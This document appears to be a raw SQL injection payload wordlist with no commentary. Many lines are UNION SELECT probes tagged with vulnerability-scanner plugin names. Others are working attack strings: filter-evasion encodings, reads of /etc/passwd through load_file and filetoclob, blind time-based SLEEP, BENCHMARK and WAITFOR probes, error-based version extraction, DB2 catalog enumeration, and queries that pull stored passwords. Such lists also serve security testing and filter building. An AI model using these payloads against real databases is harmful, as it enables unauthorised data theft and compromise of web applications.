'/**/union/**/select/**/1,2,1332010419,4--
-1/**/union/**/select 289896836--
-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
-1/**/union/**/select 1284503405--
pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- 
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
9999/**/union/**/select/**/1331908730,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --
'union/**/select/**/0,0,616656011,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
' union select 1,1,'1331909175','calendarix_month_sql_injection.nasl',1 
'union/**/select/**/0,0,1448356578,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1/**/union/**/select/**/1331909420,1,1564569063--
-1 union select 1,1331919215,154330261 --
'/**/union/**/select/**/1,2,1332009308,4--
-1/**/union/**/select 109024103--
'union/**/select/**/0,0,1358744507,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
200607' union select 1,1908404704,1,1,1,1,1,1,1,1--
200607' union select 1,240520592,1,1,1,1,1,1,1,1--
200607' union select 1,1409814507,1,1,1,1,1,1,1,1--
' union select 1,1,'1331908849','calendarix_month_sql_injection.nasl',1 
34 union select 688985287
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
200607' union select 1,793421908,1,1,1,1,1,1,1,1--
'union/**/select/**/0,0,1917618887,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
200607' union select 1,106876795,1,1,1,1,1,1,1,1--
'/**/union/**/select/**/1,2,1332009308,4--
'/**/union/**/select/**/1,2,1331919225,4--
'union/**/select/**/0,0,1843478711,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2
'/**/union/**/select/**/1,2,1331904464,4--
-1/**/union/**/select 878723476--
'/**/union/**/select/**/1,2,1331905235,4--
pligg_url_sql_injection.nasl' union select 1331919216,1114321675 -- 
'/**/union/**/select/**/1,2,1332009308,4--
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- 
-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
200607' union select 1,1735345304,1,1,1,1,1,1,1,1--
'union/**/select/**/0,0,531946285,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,939754819,0,0,0,0,0--
-1/**/union/**/select 1435895751--
'union/**/select/**/0,0,1849623348,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
'/**/union/**/select/**/1,2,1331904464,4--
200607' union select 1,1249459115,1,1,1,1,1,1,1,1--
-1' union select 0,1229033432,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
'union/**/select/**/0,0,139114652,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'--
-1' union select 0,2039524728,0,0,0,0,0--
/union avenue - now here's union avenue/
-1' union select 0,32936669,0,0,0,0,0--
'/**/union/**/select/**/1,2,1331904464,4--
-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
' union select 1,1,'1331904224','calendarix_month_sql_injection.nasl',1 
'union/**/select/**/0,0,927895779,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --
-1' union select 0,1622415956,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16
'union select '1','2','pixelpost_category_sql_injection.nasl','1331908738','5'--
pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- 
1 union select 1,1332010398
-1' union select 0,218106892,0,0,0,0,0--
-1/**/union/**/select/**/0,1,1415485766,1622819751,1,1,1,1,1--
-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'union select '1','2','pixelpost_category_sql_injection.nasl','1331919009','5'--
' union select 1,1,'1331923199','calendarix_month_sql_injection.nasl',1 
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
1 union select 1,1332009306
' union select 1,1,'1331909343','calendarix_month_sql_injection.nasl',1 
-1' union select 0,2083950439,0,0,0,0,0--
'union/**/select/**/0,0,1512225497,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,960542939,0,0,0,0,0--
200607' union select 1,609673267,1,1,1,1,1,1,1,1--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
-1' union select 0,371460352,0,0,0,0,0--
200607' union select 1,162548266,1,1,1,1,1,1,1,1--
-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --
pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- 
1 union select 1,1331923201
-1/**/union/**/select/**/1332010406,1,1928557356--
200607' union select 1,652029819,1,1,1,1,1,1,1,1--
-1/**/union/**/select/**/1331919223,1,390336409--
200607' union select 1,597038072,1,1,1,1,1,1,1,1--
'union/**/select/**/0,0,1649969852,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- 
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
-9 union select null,null,null,1331923205,4,5
'/**/union/**/select/**/1,2,1331904464,4--
/site/' union all select filetoclob('/etc/passwd','server')::html,0 from sysusers where username=user --/.html
200607' union select 1,166144719,1,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --
-9 union select null,null,null,1331919224,4,5
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
1 union select 1,1331908856
200607' union select 1,733583767,1,1,1,1,1,1,1,1--
-1/**/union/**/select 368985119--
-1 union select 0,1,2,094227280668,4,5,6,7,8,9,10,11--
'union/**/select/**/0,0,1474576637,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,1139093737,0,0,0,0,0--
'union/**/select/**/0,0,739400234,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- 
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
200607' union select 1,1986790207,1,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --
-1' union select 0,1403993486,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null --
-1/**/union/**/select/**/0,1,1126849470,1437216392,1,1,1,1,1--
-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,1131566153),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--
-9 union select null,null,null,1331919223,4,5
-1/**/union/**/select/**/0,1,418619243,434476407,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- 
pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- 
-1/**/union/**/select 1089880881--
'/**/union/**/select/**/1,2,1331904464,4--
-1/**/union/**/select 1313328975--
-1' union select 0,230233793,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908834',null,null,null,null --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331908738','5'--
'union/**/select/**/0,0,1705245003,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --
'union/**/select/**/0,0,1680418306,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
200607' union select 1,742994120,1,1,1,1,1,1,1,1--
-1 union select 1,1331919007,1010516896 --
-1/**/union/**/select 625315727--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null --
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
'/**/union/**/select/**/1,2,1331904244,4--
'/**/union/**/select/**/1,2,1331909423,4--
34 union select 660865227
-1/**/union/**/select 1444832703--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
200607' union select 1,72750636,1,1,1,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
'/**/union/**/select/**/1,2,1332010419,4--
200607' union select 1,847164494,1,1,1,1,1,1,1,1--
-1' union select 0,784779737,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --
200607' union select 1,1394748835,1,1,1,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--
'/**/union/**/select/**/1,2,1331904464,4--
-1/**/union/**/select/**/0,1,266652800,1186686792,1,1,1,1,1--
34 union select 294969347
'/**/union/**/select/**/1,2,1331904464,4--
'/**/union/**/select/**/1,2,1331904464,4--
'union/**/select/**/0,0,422787269,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331905220','5'--
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
'union/**/select/**/0,0,1780794214,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1' union select 0,1279798921,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904216',null,null,null,null --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
200607' union select 1,1126595310,1,1,1,1,1,1,1,1--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
200607' union select 1,236807234,1,1,1,1,1,1,1,1--
200607' union select 1,1437541757,1,1,1,1,1,1,1,1--
' union select 1,1,'1331919194','calendarix_month_sql_injection.nasl',1 
' union select 1,1,'1332010396','calendarix_month_sql_injection.nasl',1 
pligg_url_sql_injection.nasl' union select 1331919216,1114321675 -- 
'union/**/select/**/0,0,1675094385,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'/**/union/**/select/**/1,2,1331919012,4--
pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- 
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-1' union select 0,127142342,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--
pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- 
'union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --
2pp'/**/union/**/select/**/'412745581503'/*
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
-1 union select 1,1331904452,2000273248 --
-99 union select 846061434,2,198865279,4,5,6,7,8,9,0,1,2,3 --
200607' union select 1,1515512280,1,1,1,1,1,1,1,1--
200607' union select 1,1779141938,1,1,1,1,1,1,1,1--
-1' union select 0,1377586613,0,0,0,0,0--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010409',null,null,null,null --
-1 union select 1,1331905207,2042987140 --
-9 union select null,null,null,1331908887,4,5
-9 union select null,null,null,1331919012,4,5
-1' union select 0,1692805728,0,0,0,0,0--
'union/**/select/**/0,0,419495929,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
' union select 1,1,'1331905155','calendarix_month_sql_injection.nasl',1 
-1/**/union/**/select 199771194--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null --
/javascript/union.exe
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
'union/**/select/**/0,0,1185697098,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union/**/select/**/0,0,669748674,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1332008334,1061714587 -- 
'union/**/select/**/0,0,1385593493,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union/**/select/**/0,0,814698580,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
200607' union select 1,1605338494,1,1,1,1,1,1,1,1--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
'union/**/select/**/0,0,1790180624,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1 union select 1,1331908735,712064188 --
-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16
-1/**/union/**/select/**/1331905232,1,30450087--
'/**/union/**/select/**/1,2,1331905235,4--
200607' union select 1,372196707,1,1,1,1,1,1,1,1--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904456','5'--
200607' union select 1,1085399282,1,1,1,1,1,1,1,1--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
'union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--
-1' union select 0,1702272795,0,0,0,0,0--
-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
1 union select 1,1331919001
'union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--
-99 union select 1247962577,2,176146104,4,5,6,7,8,9,0,1,2,3 --
'union/**/select/**/0,0,1888865436,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
34 union select 125016811
-1/**/union/**/select/**/1332008335,1,1403210863--
pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- 
'union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'--
1 union select 1,1331904228
-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- 
200607' union select 1,1310726682,1,1,1,1,1,1,1,1--
-99 union select 760871658,2,576927904,4,5,6,7,8,9,0,1,2,3 --
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --
'union/**/select/**/0,0,1424469027,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'/**/union/**/select/**/1,2,1331919224,4--
'/**/union/**/select/**/1,2,1331904464,4--
-1' union select 0,1486551460,0,0,0,0,0--
34 union select 452593950
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
-1' union select 0,333020620,0,0,0,0,0--
-1' union select 0,2100957477,0,0,0,0,0--
pligg_url_sql_injection.nasl' union select 1332008334,1061714587 -- 
-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--
-1/**/union/**/select/**/1331904243,1,1681261181--
'union/**/select/**/0,0,250548738,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
200607' union select 1,1547116710,1,1,1,1,1,1,1,1--
200607' union select 1,559960955,1,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --
pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- 
' union select 1,1,'1331908724','calendarix_month_sql_injection.nasl',1 
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
-1/**/union/**/select/**/0,1,1305074935,281030825,1,1,1,1,1--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
-1 union select 1,1331904452,227272765 --
-1' union select 0,1668253961,0,0,0,0,0--
-9 union select null,null,null,1331904464,4,5
-1 union select 0,1,2,849156682645,4,5,6,7,8,9,10,11--
-99 union select 663157054,2,24321334,4,5,6,7,8,9,0,1,2,3 --
'union select '1','2','pixelpost_category_sql_injection.nasl','1331908881','5'--
'union/**/select/**/0,0,1192005344,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union/**/select/**/0,0,410653569,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
9999/**/union/**/select/**/1332010411,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904216',null,null,null,null --
-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16
1 union select 1,1331904439
-1' union select 0,44220770,0,0,0,0,0--
-99 union select 996551295,2,294567145,4,5,6,7,8,9,0,1,2,3 --
'/**/union/**/select/**/1,2,1331919012,4--
-1 union select 1,1332008334,1157745168 --
'union/**/select/**/0,0,1926346269,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--
-1/**/union/**/select/**/0,1,1187747366,616507462,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --
'/**/union/**/select/**/1,2,1331904244,4--
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --
pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- 
-9 union select null,null,null,1331909422,4,5
-1 union select 0,1,2,841172808568,4,5,6,7,8,9,10,11--
-1' union select 0,1687881655,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
'/**/union/**/select/**/1,2,1331919012,4--
200607' union select 1,204130911,1,1,1,1,1,1,1,1--
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
-1' union select 0,421830018,0,0,0,0,0--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
'/**/union/**/select/**/1,2,1332010406,4--
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
200607' union select 1,230342059,1,1,1,1,1,1,1,1--
-99 union select 500066955,2,800036118,4,5,6,7,8,9,0,1,2,3 --
200607' union select 1,727670276,1,1,1,1,1,1,1,1--
'/**/union/**/select/**/1,2,1331923205,4--
-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --
' union select 1,1,'1331918956','calendarix_month_sql_injection.nasl',1 
pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--
-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --
-1/**/union/**/select 145671700--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'--
-1' union select 0,1290993919,0,0,0,0,0--
'union/**/select/**/0,0,211288531,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1/**/union/**/select 735838347--
'union/**/select/**/0,0,706027059,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
-1/**/union/**/select/**/0,1,653954551,528677520,1,1,1,1,1--
-1' union select 0,181555201,0,0,0,0,0--
-1' union select 0,1968195068,0,0,0,0,0--
' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
'/**/union/**/select/**/1,2,1331908741,4--
-1/**/union/**/select 1420911431--
34 union select 610245698
pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- 
pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- 
200607' union select 1,1764635809,1,1,1,1,1,1,1,1--
1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--
-1' union select 0,1978396456,0,0,0,0,0--
-1 union select 1,1332010414,607312942 --
-1' union select 0,1340614335,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'--
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
'union/**/select/**/0,0,1738276559,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'--
-1 union select 1,1331908874,150489293 --
-1/**/union/**/select/**/0,1,416276020,64888377,1,1,1,1,1--
jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--
-1 union select 1,1331923203,1746193209 --
'/**/union/**/select/**/1,2,1331905235,4--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
'union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-1 union select 0,1,2,709400366843,4,5,6,7,8,9,10,11--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
-1 union select 0,1,2,179101196039,4,5,6,7,8,9,10,11--
pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- 
34 union select 1948700004
-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
) union select * from information_schema.tables
 union all select @@version--
 union select 1,load_file('/etc/passwd'),1,1,1
 union select
 union select * from users where login = char ...
union+select+1,(select+concat(0x53514c69,mid((concat(hex(concat_ws(0x7b257d,version(),database(),user(),CURRENT_USER)),0x69)),1,65536))),1,1--+
' union+select+1,(select+concat(0x53514c69,mid((concat(hex(concat_ws(0x7b257d,version(),database(),user(),CURRENT_USER)),0x69)),1,65536))),1,1--+
1+union+select+abc+from+abc
'union select 1,load_file(0x2f6574632f706173737764),3 from users--
15+/*!union*/+/*!all*/+/*!select*/+1,2,3,4,5,6,7--
1++union++select++abc++from++abc
1/*union*/union/*select*/select+1,2,3/*
1%0Aunion%0Aselect%0A1,2,3/*
1'%0Cunion%0Cselect%0C1,2,3
1'%0Bunion%0Bselect%0B1,2,3
1'%0Dunion%0Dselect%0D1,2,3
union(select(version()))
1'union/*!select*/pass,load_file(0x11)from+users--
1/**/union%a0select/**/1,pass,3`a`from`users`
1+union+select+1,2,3/*
1+union+select+1,2,3--
1+union+select+1,2,3# 
1+union+select+1,2,3;%00
select versionnumber, version_timestamp from sysibm.sysversions
select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1
select current server from sysibm.sysdummy1
select name from sysibm.systables
select grantee from syscat.dbauth
select * from syscat.tabauth
select * from syscat.dbauth where grantee = current user
select * from syscat.tabauth where grantee = current user
select name, tbname, coltype from sysibm.syscolumns
SELECT schemaname FROM syscat.schemata
' aNd 1=MID((database()),1,1)>1
' aNd 2=MID((@@version,1,1)--+
' aNd 3=MID((@@version,1,1)--+
' aNd 4=MID((@@version,1,1)--+
' aNd 5=MID((@@version,1,1)--+
if(true=false,1,SLEEP(5))--+
and+if(true%21=true,1,SLEEP(5))--+
and+if(1=2,1,SLEEP(5))--+
if(1%21=1,1,SLEEP(5))--+
if(true=true,1,SLEEP(5))--+
if(2=2,1,SLEEP(5))--+
and+true=false--+
and+false%21=false--+
and(select+1+from(select+count(*),floor(rand(0)*2)from+information_schema.tables+group+by+2)a)--+
union+select+1,(select+concat(0x53514c69,mid((concat(hex(concat_ws(0x7b257d,version(),database(),user(),CURRENT_USER)),0x69)),1,65536))),1,1--+
' if(true=false,1,SLEEP(5))--+
' and+if(true%21=true,1,SLEEP(5))--+
' and+if(1=2,1,SLEEP(5))--+
' if(1%21=1,1,SLEEP(5))--+
' if(true=true,1,SLEEP(5))--+
' if(2=2,1,SLEEP(5))--+
' and+true=false--+
' and(select+1+from(select+count(*),floor(rand(0)*2)from+information_schema.tables+group+by+2)a)--+
' union+select+1,(select+concat(0x53514c69,mid((concat(hex(concat_ws(0x7b257d,version(),database(),user(),CURRENT_USER)),0x69)),1,65536))),1,1--+
WAITFOR DELAY '0:0:50';--"
'+(SELECT 1 FROM (SELECT SLEEP(50))A)+'
(SELECT 1 FROM (SELECT SLEEP(50))A)
1') AND SLEEP(50) AND ('LoUL'='LoUL"
' and+1=convert(int,@@version)
' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--"
' SELECT IF(1=1,'true','false')
and if(substring(user(),1,1)>=chr(97),SLEEP(50),1)--
' and if(substring(user(),1,1)>=chr(97),SLEEP(50),1)--
1+and+100>(ASCII(Substring(user(),1,1)))
1+and+100>(Select+top+1+ASCII(Substring(name,1,1))) from sysusers)--
1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
1 and substring(version(),1,1)=4
+order+by+19--
'1+and+'123'='123
1'+or+@@servername=@@servername--
1+and+ascii('a')=97
1+and+hex('a')=61
1+and+ord('a') = 97
'+or+round(pi(),1)+true+true = version()
+or+round(pi(),1)+true+true = version()
1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1))
1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
IF(SUBSTRING(USER(),1,4)=0x726f6f74,SLEEP(5),1)
' UNION SELECT IF(SUBSTRING(USER(),1,4)=0x726f6f74,BENCHMARK(100000000,RAND()),1)
+if(ASCII(SUBSTRING((),i, 1))>k,BENCHMARK(100000000, RAND()),1)
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
and (select substring(@@version,1,1))='X'
and (select substring(@@version,1,1))='M'
and (select substring(@@version,2,1))='i'
and (select substring(@@version,2,1))='y'
and (select substring(@@version,3,1))='c'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'
UNIONALL SELECT CONCAT(0x3a6a7a713a,IFNULL(CAST(database()	AS CHAR),0x20),0x3a79757a3a)#
23' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6e75773a,(CASE WHEN (6349=6349/*!50521 AND 6349=6350*/) THEN 1 ELSE 0 END),0x3a6270793a)#
